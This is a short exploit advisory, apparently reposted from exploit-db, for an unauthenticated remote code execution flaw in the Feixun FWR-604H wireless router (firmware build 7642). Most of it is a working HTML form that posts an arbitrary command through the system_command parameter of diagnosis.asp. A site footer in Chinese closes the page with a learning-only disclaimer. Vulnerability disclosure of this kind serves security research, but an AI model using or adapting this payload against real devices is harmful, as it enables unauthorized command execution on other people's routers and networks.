# Exploit Title: [Feixun FWR-604H Wireless Router Remote Code Execution] # Date: [2014-01-09] # Exploit Author: [Arash Abedian (http://www.exploit-db.com/author/?a=6187<http://www.exploit-db.com/author/?a=6187)> ) # Vendor Homepage: [http://feixun.com.cn] # Version: [Hardware Version 1.0, Firmware Build: 7642] # Tested on: [Hardware Version 1.0, Firmware Build: 7642] # Vulnerability Details: Feixun FWR-604H 150Mbps Wireless N Router is vulnerable to Remote Code Execution vulnerability(Hardware Version 1.0, Firmware Build: 7642, Vendor website:feixun.com.cn). The web server don't authenticate user prior to system level execution. As such an unauthenticated attacker can easily remotely exploit the target using system_command parameter in diagnosis.asp file. <html> <body> Exploit Feixun FWR-604H <FORM ACTION="http://192.168.1.1/diagnosis.asp" METHOD=POST> <input type="hidden" name="doType" value="2"> Command: <input type="text" name="system_command"> <input type="hidden" name="diagnosisResult" value=""> <input type="submit" value="Exploit"> </FORM> </body> </html>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论